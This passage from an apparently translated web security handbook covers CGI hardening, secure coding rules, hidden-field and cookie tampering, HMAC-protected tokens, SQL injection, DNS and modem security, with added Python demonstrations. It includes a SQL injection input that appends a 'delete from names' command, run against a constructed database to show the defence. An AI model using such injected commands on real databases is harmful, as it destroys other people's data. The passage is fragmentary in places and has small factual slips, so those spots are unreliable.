The second technique used to extend web servers was adding modules, usually written in C or C++. These modules are loaded into the web server at run time. Plug-ins, modules, and APIs are a faster way to connect custom programs to web servers, because with them there is no need to start a new process for each web interaction; instead the web server process itself runs the application in its own address space. But these techniques have a notable drawback: the plug-in program may be very complex, and a single bug in it can bring down the entire web server.
Embedded scripting languages [216]
The invention of web-based scripting languages was the third technique used to add programming capabilities to web pages. These systems let developers place small programs, usually called scripts, directly in the web page; an interpreter built into the web server then runs the programs in the web pages before sending the page to the web browser. These scripts can be very fast. Examples include Microsoft's ASP, PHP, server-side JavaScript, and mod_perl.
Embedded web server [217]
Finally, some systems do away with the web server program altogether and run their own custom HTTP server within their web-based applications.
Because of their power, the techniques listed here can put the security of the web server, and of the host it runs on, at serious risk, because potentially any program can be run through these interfaces: even programs that have security problems, programs that give outsiders access to your computer, or programs that modify or delete critical files on your system.
Two techniques can be used to limit the damage caused by web applications:
• Programs must be designed and reviewed so as to ensure that they cannot do anything other than the intended operations;
• Programs must run in a restricted environment. Then, if an attacker misuses the programs to make them behave in an unanticipated way, the resulting damage will also be limited.
In multi-user operating systems, where different users can run programs at different access levels, web servers usually run under a restricted user account, such as the nobody or httpd account. In that case all programs, including CGI and API programs that are misused with the aim of disrupting the system, will also run under that same restricted user account. [218]
Unfortunately, other operating systems have not provided such a capability for using restricted user accounts. For example, in versions 3.1, 95, 98, and ME of Windows, and in Mac OS 7-9, which was in use before Mac OS X, there was no simple way for the operating system to restrict what CGI programs could access.
Knowing whether a computer is configured correctly is not easy in itself, but what complicates matters further is that there are scanners that can find vulnerable computers automatically. For example, on Windows-based systems the perl executable (PERL.EXE) should never be placed in the CGI scripts directory, yet unfortunately many Windows web servers are configured exactly this way, simply because doing so makes it easier to run perl scripts on the server.
Another cause for concern is programs or scripts that were previously distributed for use with web servers and in which security vulnerabilities were later discovered. Because web server administrators rarely delete programs that are part of the server's default configuration (since it is very hard to tell whether a script is in use or not), these dangerous programs and scripts may remain in place for months or even years, even if the flaw has been fixed in newer versions of the web server.
To protect yourself against programs, scripts, and CGI programs whose security flaws may come to light later, move all programs installed by default on the web server to a new directory so that they remain available, and move them back to the working directories only when they are really needed.
are not invalid today may be considered invalid characters in the future! For example, many older programs did not anticipate Unicode symbols, which are widely used today.
For more examples of unintended side effects, see Chapter 16 of the second edition of "Web Security, Privacy, and Commerce" by Garfinkel. [219]
219 Garfinkel
use, the intended arguments, the signals received, and other aspects of its behavior carefully. Make a list of all possible errors and of how your program will respond to them. You can even describe the various parts of the program in English or in your native language before writing it in a computer language.
2. Before you start programming, show the specification you have written for the program to another programmer. Make sure they also understand the specification and believe it works correctly. If you cannot convince another programmer that what you designed on paper works correctly, go back to the design phase and clarify the program's specification. Rest assured that several times the time you spend on this will be saved during programming.
3. To write your script, choose a language that provides safety features for CGI scripts and prevents buffer overflow errors. perl, python, and ruby are good choices in this respect, and C and C++ are usually considered poor choices. Never write CGI scripts for shell interpreters such as /bin/sh.
4. If possible, reuse existing scripts. When you can use debugged CGI library files there is no need to write a library file of your own, but at the same time beware of reusing scripts that contain Trojan horses.
5. Test each small part of the script after writing it. Once you have started writing the script, test it frequently. When testing a given part, remember to use both expected and unexpected input data. Wherever possible, the program's functions should verify the correctness and validity of their input arguments before accepting them, and respond sensibly to invalid arguments (for example by exiting the program and displaying a message or code indicating that the argument is invalid). A large number of security vulnerabilities are simple programming bugs that can be exploited. By writing program code more carefully, you make the program you produce more secure.
6. Check all input values supplied by the user. A considerable number of security problems arise because an attacker sends an unexpected input value or an unanticipated data format to a program function. A simple way to prevent such problems is for scripts always to check their input arguments for correctness and validity. Checking arguments does not slow these scripts down much, but it makes hostile users less able to misuse them. In addition, checking arguments and reporting failures makes it easier to fix the software's non-security bugs as well.
7. Check the arguments that the program passes to operating system functions. Even when the program is calling a system function, you should still check the arguments to make sure they are what that system function expects. For example, if you think your program is opening a file in the current directory, you can use the index() function in C or perl to see whether the file name contains a slash character (/); if the file name contains a slash and should not, the program should not open that file.
8. Check all the return values of system calls. The POSIX programming specification (used by programs written in C and PERL) requires every system call to return a return code. Even system calls that you would not expect to fail, such as write(), chdir(), or chown(), may fail under exceptional conditions and return unusual values. When a call fails, check the error number variable [220] to find out why. Write your program so that it can log unexpected values and then terminate its process cleanly if a system call fails for any unexpected reason. Doing this goes a long way toward reducing future programming bugs and security problems.
9. Include internal consistency and integrity checking in your software. If a variable in your program should only be able to take the values 1, 2, or 3, check the variable for these values, and make provision for the case where it has some other value. (If you program in C, you can do this easily with the assert macro.)
10. Log the program and its behavior extensively. Detailed logs usually give you more detail than summary logs. Rather than logging the results of common errors and relying on the web server's log file, keep your log information in a dedicated log file. Doing this will make it easier for you to find problems. Also consider using the syslog facility (on UNIX) so that you can direct logs to files and users, send them to programs, or forward them to other computers.
11. Keep the critical parts of your programs as simple and small as possible.
12. Always use full path names for arguments, both for command files and for data files. Instead of making the program's correct execution depend on the current directory, explicitly specify the correct path in which the program is to run.
13. Be alert to race conditions [221] in the program. These can take the form of a deadlock [222] or of a failure of two closely spaced calls to execute correctly:
Deadlock conditions
As you know, more than one copy of a program may be running at the same time, and for that reason it is best to lock any file you want to modify. Make provision for unlocking the file in the case where the program locks a file and is then thrown out of memory. Prevent deadlock and the conditions that can lead to deadlock. This situation arises when, for example, one program first locks file A and then wants to lock file B, while at the same time another program that has already locked file B wants to lock file A as well.
Race conditions
Remember that your program does not run without interruption from start to finish; there may be a brief pause between any two instructions of the program so that part of another program, perhaps even one that wants to interfere with your program, can run. So examine your program code carefully to make sure it contains no two consecutive instructions that would break if arbitrary commands were executed between them. In particular, when you perform several operations on a file (for example changing its owner, checking its status, changing its mode, and so on), first open the file and then use the fchown(), fstat(), and fchmod() system calls. Doing this means that, while your program is running, another program cannot replace that file, and you thereby prevent a possible race condition. Also, do not use the access() function to find out whether a file can be accessed, because using this function followed by a call to open() is one of the well-known race conditions.
14. Do not set your program to save core files except during testing. Core files can fill an entire disk, and they can also contain confidential information. In some cases an attacker can break into a system simply by exploiting the fact that a program saves core files. Instead of saving core files, set up your program to log problems and exit. You can use the setrlimit() function to set the maximum core file size to zero.
15. Do not create your files in world-writable directories. If your script must run under the "nobody" user account, make the nobody user the owner of the directory in which the script will create files. Provide a dedicated area for temporary files for each script, or at least for each set of related scripts, called a subsystem (to do this, you can give each script a separate directory for creating temporary files, or require each script to name its temporary files so that they all begin with the name of that script). If the web server is also used as a general host for Unix shell functions, do not store temporary files in the /tmp directory.
16. Do not place much trust in the IP addresses of the packets you receive. These addresses may have been forged, tampered with, or hijacked by proxy servers.
17. Put some form of load shedding [223] or load limiting [224] in your server so that heavy loads can be handled. For example, you can write your scripts to check the server load before running and, if it exceeds a predetermined ceiling, to exit with a polite message to the user. This makes things harder for an attacker who is trying to mount a denial-of-service attack against your server by invoking a script many times. It also protects your server when hundreds of users press the reload button to make a slow script run faster.
18. Set appropriate and reasonable time limits for running scripts. Your program can stall for many reasons; for example, a read request to a remote server may go unanswered, or a web browser may refuse to accept the information you send. A simple way to solve both problems is to limit the time for which a CGI script may use the server's resources. Then, as soon as the program exceeds the set time limit, it should free its memory and exit. On most modern systems some kind of function call can be used to impose these time limits.
19. Set reasonable limits on the CPU use of your running CGI scripts. A minor bug in a CGI script can put it into an infinite loop. To protect users and the web server against this possibility, strict limits must be placed on the total CPU time that CGI scripts can consume.
20. Do not ask the user to authenticate by sending a reusable password in plaintext over the network. If you use user IDs and passwords, use a web server with encryption support so that the password is not transmitted in plaintext. Alternatively, you can use client-side certificates for authentication. If your users can reach an IIS web server through an Internet browser, you can use NTLM [225], a version of the HTTP protocol with Microsoft-proprietary modifications. Finally, you can use HTTP Digest authentication [226], which uses an MD5 MAC to verify a password shared between the server and the web browser. Apache 2.0 and later versions support Digest-based authentication with the mod_auth_digest module, and its use in various browsers is also increasing. A primary drawback of Digest-based authentication is that it requires the web server to use an unencrypted copy of each user's password. For more details on Digest-based authentication, search the Apache documentation for AuthDigestFile or see:
http://www.apache.org/doc-2.0/mod/mod_auth_digest.html
21. Read through your program's code and see in what ways you yourself could attack it, and how the program would behave if it received unexpected input. Examine what effect it would have on the program's behavior if you could introduce a delay between two system calls.
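
The race-condition advice in item 13 (open the file first, then use fstat() and fchmod() on the descriptor, and do not pair access() with a later call by name) can be seen in the following added example, which is not part of the handbook. The function names, file names, and the `between` hook that stands in for another process running between two system calls are assumptions made for the illustration.

```python
import os
import stat
import tempfile


def racy_set_mode(path, mode, between=lambda: None):
    """Check by name, then act by name: the pattern item 13 warns against."""
    if not os.access(path, os.W_OK):      # check refers to whatever 'path' is now
        raise PermissionError(path)
    between()                             # another program may run here
    os.chmod(path, mode)                  # acts on whatever 'path' is by then


def safe_set_mode(path, mode, between=lambda: None):
    """Open once, then do every check and change through the descriptor."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)   # refuse a symlink at open time
    try:
        between()                         # replacing the name no longer matters
        st = os.fstat(fd)                 # describes the file that was opened
        if not stat.S_ISREG(st.st_mode) or st.st_uid != os.geteuid():
            raise PermissionError(path)
        os.fchmod(fd, mode)               # changes that same file, not the name
    finally:
        os.close(fd)


def demo():
    """Run both variants while the name is replaced between check and use.

    Returns the final permission bits of an unrelated file for each variant.
    All files are constructed inside a private temporary directory.
    """
    results = {}
    for label, set_mode in (("racy", racy_set_mode), ("safe", safe_set_mode)):
        with tempfile.TemporaryDirectory() as workdir:
            work = os.path.join(workdir, "upload.tmp")     # file the script owns
            other = os.path.join(workdir, "other.conf")    # file it must not touch
            for name in (work, other):
                with open(name, "w") as handle:
                    handle.write("constructed sample\n")
                os.chmod(name, 0o600)

            def swap():
                # Simulated interleaving: the name now points somewhere else.
                os.unlink(work)
                os.symlink(other, work)

            set_mode(work, 0o644, between=swap)
            results[label] = stat.S_IMODE(os.stat(other).st_mode)
    return results


if __name__ == "__main__":
    for label, mode in demo().items():
        print(label, oct(mode))
```

In the racy variant the unrelated file ends up with the new mode; in the descriptor-based variant it keeps its original 0600 permissions.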
Remember that most security flaws are really programming errors. In one respect this can be seen as good news, because the more secure programmers make their programs, the more reliable and dependable they have in fact made them.
Even in the best cases, it is very hard to find software on the web server and in the browser that work together in full harmony. What undermines the whole process from a security standpoint is that attackers, by definition, do not play by the rules. They can certainly open your HTML forms and JavaScript programs in ordinary browsers so that nothing goes wrong, but they can also choose not to do so, and instead take the program text, analyze it, and send your server entirely tailored and malicious responses. Detecting this kind of attack is very hard, because it is not easy for ordinary web developers to test their programs against such attacks; and in any case most of these programmers do not have the trusted tools needed to examine possible attacks against a CGI script.
Storing information in the browser instead of on the web server is not inherently wrong; indeed it even removes the need for databases, user tracking, and many other server-side technologies. But in that case you must check the information whenever you receive it from the user, to make sure that nothing in it has been corrupted.
225 NT Challenge/Response
226 HTTP Digest Authentication
Many programmers do not understand the need to validate information returned from users' browsers to the server. For example, in December 1999 engineers at ISS [227] noticed that many e-commerce scripts belonging to different vendors all shared a common vulnerability: they all supported shopping carts in which the fixed price of each item was also stored, but all of this information was held in the browsers and no integrity check was performed on it. [228] When an invoice was prepared and its cost was charged to the credit card, the programs blindly trusted the prices in the shopping carts, and so any attacker who wanted to give himself a discount could, by submitting an online purchase request, save the server's HTML form on his computer's hard disk, alter the prices, and then press the "Buy" button.
In a study carried out in spring 2001, [229] four MIT graduates found that many e-commerce sites do not properly validate the information in cookies, and as a result they were able to make clever changes to e-commerce sites' cookies to gain access to unauthorized information.
Some web developers use hidden fields to store the information needed for session tracking (identifying the user) in e-commerce systems. For example, instead of using HTTP basic authentication, developers sometimes place the user name and password supplied by the user in hidden fields for all subsequent forms:
<INPUT TYPE="hidden" NAME="username" VALUE="simsong">
<INPUT TYPE="hidden" NAME="password" VALUE="myauth11">
Hidden fields can also be used to implement shopping carts:
<INPUT TYPE="hidden" NAME="items" VALUE="3">
<INPUT TYPE="hidden" NAME="item1" VALUE="Book of Secrets:$4.99">
<INPUT TYPE="hidden" NAME="item2" VALUE="Nasty Software:$45.32">
<INPUT TYPE="hidden" NAME="item3" VALUE="Helping Hand:$32.23">
Instead of placing this information in hidden fields, it can be placed directly in the URL. Once they reach the server, these URLs are interpreted just as before, as if they were in web page forms and had been sent using the HTTP GET protocol. For example, the following URL contains the same user name and password as before:
http://www.vineyard.net/cgi-bin/password_tester?username=simsong&password=myauth11
Using hidden fields is very easy; in exchange, very little information (and perhaps none at all) has to be stored on the server; and unlike cookies, which are limited to 4069 bytes, hidden fields can in practice be of any size. But using hidden fields in this way also brings problems:
• If the user presses the back button, items may be removed from the shopping cart. Sometimes this is expected and useful, but not always.
• HTML pages used by one person may be seen by someone else, for example because a computer is shared among several people. In these circumstances each user's user name, password, or shopping cart contents may be disclosed to the others.
• If you use the URL to store and transfer information, the full URL, which contains the embedded information, will be stored in the web server's log files. When the user accesses another web server, the browser may send the full URL in the referer [sic] header, and as a result security or privacy may
Using cookies
An attractive alternative to using hidden fields or URLs in this way is to store information such as the user name, password, shopping cart contents, and the like in HTTP cookies.
Users can modify their cookies, and so cookies used for user tracking, shopping carts, and other kinds of e-commerce applications also suffer from all the problems of hidden fields and compound URLs. In addition, cookies have problems of their own:
• Under some circumstances old cookies may be usable even after they have expired;
• Users can make long-lived copies of cookies that are meant not to be copied to the hard disk; and
• Some users distrust cookies and disable the feature altogether.
Using cryptography to strengthen hidden fields, compound URLs, and cookies
Many of the problems described above can be solved by encrypting the information in hidden fields, compound URLs, and cookies. Cryptography can prevent users from understanding the information stored on their computers, and can also allow web server programs to detect unauthorized or accidental changes to this information. Here are the examples from the previous section with cryptography applied.
Validating the user name and password:
http://www.vineyard.net/cgi-bin/password_tester?p6e6J6FwQOk0tqLFTFYq5EXR03GQ1wYWG0ZsVnk09yv7ItIHG17ymls4UM%2F1bwHygRhp7ECawzUm%0AKl3Q%2BKRYhlmGILFtbde8%0A
In each of these cases, the plainly readable variables have been replaced with a block of encrypted information. This encrypted block is produced using a procedure like the following:
1. Encode the individual variables whose values must be protected as a string of characters. This is called marshalling. [232]
2. Add a 4-byte timestamp to these variables. This makes your programs safe against "replay" attacks.
232 Marshalling
3. Compress the data. This means less space is taken up.
4. Add the length of the data string to the rest of the data. This is necessary so that you can decrypt the encrypted block.
5. Encrypt the character string using a symmetric encryption function and a secret key.
6. Compute an HMAC digest of this encrypted string and append it to the encrypted string. This HMAC digest protects all of the encrypted, compressed, and marshalled information.
7. Encode the resulting encrypted and compressed string with Base64 and return the resulting string.
8. Use this encoded, encrypted, compressed string for hidden fields, compound URLs, and cookies.
To decrypt and validate this encrypted string, follow the steps below, which reverse the previous operations:
1. Obtain the encoded, encrypted, compressed string from the hidden field, compound URL, or cookie.
2. Locate the Base64 encoding and separate it from the rest of the string.
3. Decode the Base64-encoded string.
4. Verify the HMAC. If it does not verify, the string has been tampered with; in that case return an error.
5. Decrypt the data.
6. Obtain the length of the data string and use it to recover the original string at its correct length. This step is needed because the encryption function usually appends null bytes to the end of its input to bring it up to a predetermined length.
7. Decompress the compressed data.
8. Read the timestamp from the beginning of the resulting data. If the timestamp is too old, reject the data.
9. Return the remaining data to the original caller, which recovers the values of all the original variables from the string.
These steps look very complicated and computationally expensive, but in fact encoding the data is quite simple and can be done very quickly. Ready-made library functions for it also exist, such as CGI::EncryptForm in Perl.
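The sealing and opening procedures above, as added example code in Python (it is not from the handbook and is not how CGI::EncryptForm works). Assumptions: URL-encoding as the marshalling format, HMAC-SHA256, separate keys for encryption and for the HMAC, padding to 16 bytes, and, because Python's standard library has no block cipher, a stand-in stream cipher built from HMAC-SHA256.

```python
import base64, hashlib, hmac, os, struct, time, zlib
from urllib.parse import parse_qsl, urlencode

BLOCK = 16       # pad to a fixed multiple, as a block cipher would (assumed size)
NONCE_LEN = 16
MAC_LEN = 32     # HMAC-SHA256 digest size


class TokenError(Exception):
    """Raised when a token is malformed, modified or too old."""


def _xor_keystream(key, nonce, data):
    # Stand-in symmetric cipher (assumption): XOR with an HMAC-SHA256
    # counter-mode keystream. Use a vetted cipher such as AES in production.
    out = bytearray()
    for offset in range(0, len(data), 32):
        counter = struct.pack(">Q", offset // 32)
        pad = hmac.new(key, nonce + counter, hashlib.sha256).digest()
        out.extend(a ^ b for a, b in zip(data[offset:offset + 32], pad))
    return bytes(out)


def seal(fields, enc_key, mac_key, now=None):
    issued = int(time.time() if now is None else now)
    marshalled = urlencode(sorted(fields.items())).encode()       # 1. marshal
    stamped = struct.pack(">I", issued) + marshalled              # 2. 4-byte timestamp
    packed = zlib.compress(stamped)                               # 3. compress
    framed = struct.pack(">I", len(packed)) + packed              # 4. record the length
    framed += b"\0" * (-len(framed) % BLOCK)                      #    null padding
    nonce = os.urandom(NONCE_LEN)
    sealed = nonce + _xor_keystream(enc_key, nonce, framed)       # 5. encrypt
    sealed += hmac.new(mac_key, sealed, hashlib.sha256).digest()  # 6. append HMAC
    return base64.urlsafe_b64encode(sealed).decode("ascii")       # 7. Base64


def unseal(token, enc_key, mac_key, max_age=900, now=None):
    try:
        raw = base64.urlsafe_b64decode(token.encode("ascii"))
    except ValueError as exc:   # covers binascii.Error and UnicodeEncodeError
        raise TokenError("not valid Base64") from exc
    if len(raw) < NONCE_LEN + BLOCK + MAC_LEN:
        raise TokenError("token too short")
    sealed, tag = raw[:-MAC_LEN], raw[-MAC_LEN:]
    expected = hmac.new(mac_key, sealed, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):      # verify before decrypting
        raise TokenError("HMAC mismatch: token was modified")
    framed = _xor_keystream(enc_key, sealed[:NONCE_LEN], sealed[NONCE_LEN:])
    (length,) = struct.unpack(">I", framed[:4])     # length field removes the padding
    if length > len(framed) - 4:
        raise TokenError("bad length field")
    stamped = zlib.decompress(framed[4:4 + length])
    (issued,) = struct.unpack(">I", stamped[:4])
    current = int(time.time() if now is None else now)
    if current - issued > max_age:                  # replay window
        raise TokenError("token expired")
    return dict(parse_qsl(stamped[4:].decode(), keep_blank_values=True))


if __name__ == "__main__":
    enc_key, mac_key = os.urandom(32), os.urandom(32)
    token = seal({"user": "alice", "cart": "3"}, enc_key, mac_key)
    print(token)
    print(unseal(token, enc_key, mac_key))
```

The HMAC is checked before anything is decrypted or decompressed, so a modified token is rejected without its contents ever being parsed.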
If you use database servers to make your web pages more powerful, be sure that those servers are deployed and operated with every aspect of security taken into account.
Use filtering and quoting when displaying database contents directly
As mentioned earlier, it is very important to filter all information supplied by users to make sure that it contains only permitted characters. When you work with SQL servers, checking user input before sending it to the server becomes doubly important, because users must be prevented from constructing arbitrary SQL commands and sending them to the SQL servers.
For example, if you have a web form that asks the user for a name and then stores this information in a database, the script that does this will most likely read the name from a field, store it in a variable such as $name, and then build an SQL command from that variable. Consider this perl fragment:
$name = param('name');
sql_send("insert into names (name) value ('$name');");
Unfortunately this approach is not very safe: someone who is familiar with the structure of your program can enter specially crafted input as the name, causing an SQL command of their choosing to be executed. Consider this name:
Insert into names (name) value ('John Smith')"; delete from names; ');
Most SQL servers, on receiving such text as input, insert one record into the names table, then delete all the data in that table, and then report an SQL error.
The way to protect scripts against this class of attack is to make sure that, first, you filter input data carefully and, second, you properly quote all filtered data before sending it to the SQL server.
The best way to quote is to use a function that is always called separately for each string sent to the SQL server. If you use perl with a DBI package, most database drivers provide a quote method that does this for you, which you can use as follows:
# $dbh is a DBI object that represents a handle to an open database connection
$qname = $dbh->quote(param('name'));
$dbh->do("insert into name (name) value($qname)");
Another approach is to precompile your SQL queries using variable binding. This lets you compile SQL queries with placeholders for the variables instead of the actual values. For example, the previous query could be run through a hypothetical SQL interface that uses the @ sign as the variable placeholder:
$name = param('name');
sql_bind($func,1,$name); # bind the variable name to the first variable
sql_exec($func); # execute the bound function
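The difference between building SQL text from user input and binding the input as a variable, as a runnable added example in Python with the standard sqlite3 module (not code from the handbook). The table mirrors the page's names table, the hostile name is a constructed sample modelled on the one shown above, the character filter is an assumption, and `?` plays the role of the `@` placeholder.

```python
import re
import sqlite3

# Filter (assumption): letters, spaces, dots, hyphens and apostrophes only.
NAME_OK = re.compile(r"[A-Za-z][A-Za-z .'\-]{0,63}")

# Constructed hostile input, modelled on the name shown in the text.
HOSTILE = "John Smith'); delete from names; "


def fresh_db():
    """In-memory database with two existing rows (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table names (name text)")
    db.executemany("insert into names (name) values (?)", [("Alice",), ("Bob",)])
    db.commit()
    return db


def names(db):
    return [row[0] for row in db.execute("select name from names order by rowid")]


def store_unsafe(db, name):
    """The sql_send() pattern: input pasted into the SQL text.

    Returns the SQL error message, or None if the server reported no error.
    SQLite spells the keyword 'values'.
    """
    try:
        db.executescript("insert into names (name) values ('%s');" % name)
        return None
    except sqlite3.Error as exc:
        return str(exc)


def store_bound(db, name, check=True):
    """Filter first, then hand the value to the server as a bound variable."""
    if check and not NAME_OK.fullmatch(name):
        raise ValueError("name contains characters that are not allowed")
    db.execute("insert into names (name) values (?)", (name,))
    db.commit()


if __name__ == "__main__":
    db = fresh_db()
    error = store_unsafe(db, HOSTILE)
    print("string-built SQL:", names(db), "| error:", error)

    db = fresh_db()
    store_bound(db, HOSTILE, check=False)     # binding alone keeps it as data
    print("bound variable:  ", names(db))

    db = fresh_db()
    store_bound(db, "O'Brien")                # legitimate apostrophe, stored intact
    print("filtered + bound:", names(db))
    print("unsafe O'Brien:  ", store_unsafe(fresh_db(), "O'Brien"))
```

The string-built path empties the table and then reports an SQL error, as the text describes, and it also breaks on the harmless name O'Brien; the bound path stores both inputs as plain data.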
If you use the DBI package, you can usually write this function as follows:
Updating content
How do your users update the content of the web server? In the early days of the World Wide Web, most content was created directly on web servers by programmers and developers using text or HTML editors; today most content is created on PCs and Macs and then uploaded to the web server. This upload is really a file transfer operation, and for that reason it can be eavesdropped on. As discussed earlier, users should be required to use a secure file transfer system such as scp, WebDAV over SSL, or insecure file transfer programs run over a virtual private network. In some cases it may be preferable to transfer programs physically on media such as floppy disks or compact discs.
use the host, and so an attacker who can take control of DNS or corrupt its contents will usually be able to use that as an effective step toward breaking into your system.
Besides resolving individual host names, DNS also provides a mechanism for downloading a copy of a name server's entire database. This process is called a zone transfer, and it is the same process that secondary servers use to obtain a copy of the primary server's database.
DNS can communicate over either UDP or TCP. Because UDP is a fast, packet-based protocol that carries a limited amount of data, it is usually used for the actual process of resolving host names. TCP is mostly used by applications that need to exchange large amounts of data reliably and in a sustained way, which is the case for zone transfers. Individual queries can also use TCP.
A zone transfer can be a security risk, because it can hand an outsider a complete list of all the computers connected to the organization's internal network. Many sites allow DNS packets that use UDP to pass through their firewalls and routers, but explicitly block DNS zone transfers that originate from an external site. This design is a compromise between security and usability: external users will be able to find the IP address of any internal computer, but only if they already know that computer's name.
You can block zone transfers by using a router that filters packets and blocks TCP connections on port 53. Recent versions of the BIND name server implement a directive called "allow-transfer" that lets you specify the IP addresses of the hosts that are permitted to perform zone transfers. This is useful when you want to allow secondary servers outside your organization to transfer zones, but do not want anyone else to be able to do so.
There are three main ways in which an attacker can cause a name server to give out incorrect information:
malicious information will then have no way of reaching your name servers. (Of course, depending on how you have built and configured your firewall and on what you allow users to do on the network, this solution may not be of much use to you!)
Using dynamic DNS
Modern DNS servers have facilities for updating DNS tables dynamically. These facilities are useful when IP addresses are assigned dynamically or are shared among many people. Dynamic DNS makes it possible to update the tables of a running DNS server without manually uploading a zone text file and restarting the server. At the same time, an attacker can use this facility to make malicious updates.
To be secure, dynamic DNS updates must be properly authenticated. Otherwise an attacker can attack your network simply by changing the mapping between domain names and the IP addresses of your computers. Many dynamic DNS servers authenticate on the basis of IP address and of either a shared key or updates signed with a public-key algorithm (under these schemes only particular IP addresses are permitted to submit updates). In general, combining the source IP address of the update with one of these two cryptographic methods can provide a higher level of security.
If dynamic DNS is not implemented correctly and you enable it, an attacker can use it to gain the ability to make changes on the server. Many domain name servers suffer from repeated malicious dynamic DNS update attacks.
DNSSEC
DNSSEC (RFC 2535 and 3130) is an extension of DNS that provides a DNS-based public key infrastructure and the ability to use it to sign DNS responses. DNSSEC is a popular protocol. Its proponents believe that it is a simple way to deploy PKI that does not depend on expensive certificates sold by centralized certification authorities. Unfortunately, because of the ambitious nature of DNSSEC and the fact that its use in commercial environments is not very profitable, very little effort has been made to deploy it widely.
By following the recommendations below you can reduce the likelihood that attackers will tamper with your name servers:
• Run your name server on a computer that has no user accounts.
• If you must run your name server on a computer that is used by ordinary users, make sure that the name server's files and directories are protected from access by users. If your name server can be configured to run under an unprivileged user account (as recent versions of BIND can), you should use this feature and make the name server's files accessible only to that user.
• If your name server can run in a restricted chroot jail filesystem environment (as recent versions of BIND can), you can use this option to limit its access to the other files on that host.
• Configure your name server to reject requests sent from bogus IP address ranges.[237] In BIND, the blackhole directive in the named.conf file can be used for this purpose.
• Configure your name server so that it does not perform recursive, repeating DNS queries for external users. If your server cannot find the information a client needs for a request, the client itself issues the queries required to resolve the name; recursive queries, however, consume the name server's resources and therefore should not be available to external users. In BIND, the allow-recursion directive controls which clients may issue recursive queries.
• If you know of a particular site that is trying to attack your name server, you can use BIND's bogusns directive to prevent the results of your name server's queries from being sent to it, or add that site to your firewall's blacklist.
• If you use dynamic DNS update facilities, require that updates be properly encrypted or cryptographically signed, and never rely on IP addresses for authentication.
[237] For example, if your subnet does not use the address 10.0.0.8, that address is a bogus address within your network.
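A check for the three BIND directives named in the list above, as added Python example code (not from the handbook and not part of BIND). The sample configurations and addresses are constructed, and the parser is a deliberate simplification: it reads only the options statement and does not handle nested address-match lists or comment markers inside quoted strings.

```python
import re

CHECKED = ("allow-transfer", "allow-recursion", "blackhole")


def strip_comments(text):
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)   # /* ... */
    return re.sub(r"(//|#)[^\n]*", "", text)            # // ... and # ...


def options_block(text):
    """Return the body of the options { ... } statement, or '' if absent."""
    match = re.search(r"\boptions\s*\{", text)
    if not match:
        return ""
    depth, pos = 1, match.end()
    while pos < len(text) and depth:
        depth += {"{": 1, "}": -1}.get(text[pos], 0)
        pos += 1
    return text[match.end():pos - 1]


def match_list(block, directive):
    """Address-match list of a directive, or None when it is not set."""
    pattern = r"(?<![\w-])%s\s*\{([^}]*)\}" % re.escape(directive)
    match = re.search(pattern, block)
    if not match:
        return None
    items = match.group(1).split(";")
    return [item.strip().strip('"') for item in items if item.strip()]


def audit(conf_text):
    """List (directive, problem) pairs for the directives the text recommends."""
    block = options_block(strip_comments(conf_text))
    findings = []
    for directive in CHECKED:
        allowed = match_list(block, directive)
        if allowed is None:
            # Not set: the server's built-in default applies; set it explicitly.
            findings.append((directive, "not set"))
        elif directive != "blackhole" and "any" in allowed:
            findings.append((directive, "open to any"))
    return findings


# Constructed sample configurations.
WEAK = """
options {
    directory "/var/named";      // constructed sample
    allow-transfer { any; };
    # allow-recursion { localhost; };   (commented out, so not in effect)
};
"""

HARDENED = """
acl "secondaries" { 192.0.2.53; };
options {
    directory "/var/named";
    allow-transfer { "secondaries"; };
    allow-recursion { 10.1.0.0/16; localhost; };
    blackhole { 10.99.0.0/16; };   # a range this network does not use
};
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit(conf))
```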
Chapter Seven
Network Security
Overview
Very few computers are used as standalone workstations; most are connected to other computers through modems, networks, or wireless links. This chapter discusses security issues for administrators who configure computers for connection to networks. We first look at how a computer is connected to a network using modems, routers, and wireless devices, paying particular attention to the security issues of each, and then turn to the principles of network security in TCP/IP networks, the dominant network protocol both in local networks and on the Internet.
Modems
At the present stage of the Internet's worldwide growth there are still many reasons to pay attention to the security of modems and the dial-up services associated with them. Because dial-up services are simple to set up and cheap to maintain, many of them are still in use; some have been running for a decade or more. For this reason, even with wide access to local networks and high-speed connections, there may be many compelling reasons that lead you to set up a network with modem-based connections. If your organization's staff want to use their work computers from home after hours or at weekends, a modem can make that possible. Administrators can likewise dial in to a network to support and administer it remotely. An employee who travels to, say, a village can still reach the computer at work by modem, especially where Internet service is not yet offered nationwide or, where it is offered, is not secure.
Despite all these advantages, using modems carries many risks. Because people routinely send their usernames and passwords over modems, you must be sure that the modem and its server software are correctly installed, work properly, and do exactly what you expect them to do. In addition, because dial-up service can be set up with a simple analog telephone line or even a mobile phone, an ordinary person with no special knowledge or authorization from the organization's management can easily put it to use.
The modem is a remote-access device that was invented in the 1960s, first came into use in the 1970s, and became widespread in the 1980s and 1990s. Even so, modems still have an important place in today's computing landscape. Attackers know that by finding modems that have not been properly secured they can break into networks that are otherwise protected, and for this reason computer security professionals must be familiar with modem security issues.
Modem security
Using a modem raises security issues because it can create a link between your computer and the outside world. People inside the organization may use modems to remove vital and confidential information, and people outside the organization can use them to gain unauthorized access to your computer. If your modems can be sabotaged or reprogrammed, they can be used to mislead users and expose their passwords; and finally, attackers may be able to eavesdrop on information transmitted through the modem.
Despite the spread of the Internet, modems are still a very effective means of breaking into the networks of large companies. The simple reason is that although companies control their network connections tightly, they usually do not protect or audit their modems, even though modems must be administered securely if security is to be maximized.
The first step is to protect the modem itself. Make sure that modems are physically located in a secure place where unauthorized people cannot get at them. The purpose of this protection is to prevent tampering with and alteration of the modems' connections. With suitable access to some modems, passwords and small programs can be altered and then reloaded, and you must be able to prevent this from happening. You can make a note of the modem's configuration options (if it has any) and check them from time to time to make sure that they have not been tampered with.
Many modern modems can be configured and tested remotely. This makes changes easier for staff who manage several offices remotely, but it also makes it easier for an attacker to abuse the modem. So if your modem has such features and you do not make specific use of them, make sure that they are disabled.
Another important aspect of protecting modems is protecting their telephone numbers. Treat modem telephone numbers the way you treat your passwords, and give them to no one except those who need them. Publicizing modem telephone numbers increases the chance that attackers will use them to break into your system. If your telephone system allows you to change your modem numbers, be sure to do so annually, and request numbers for your modems that do not share a prefix with your organization's ordinary telephone numbers, so that they are less likely to be guessed.
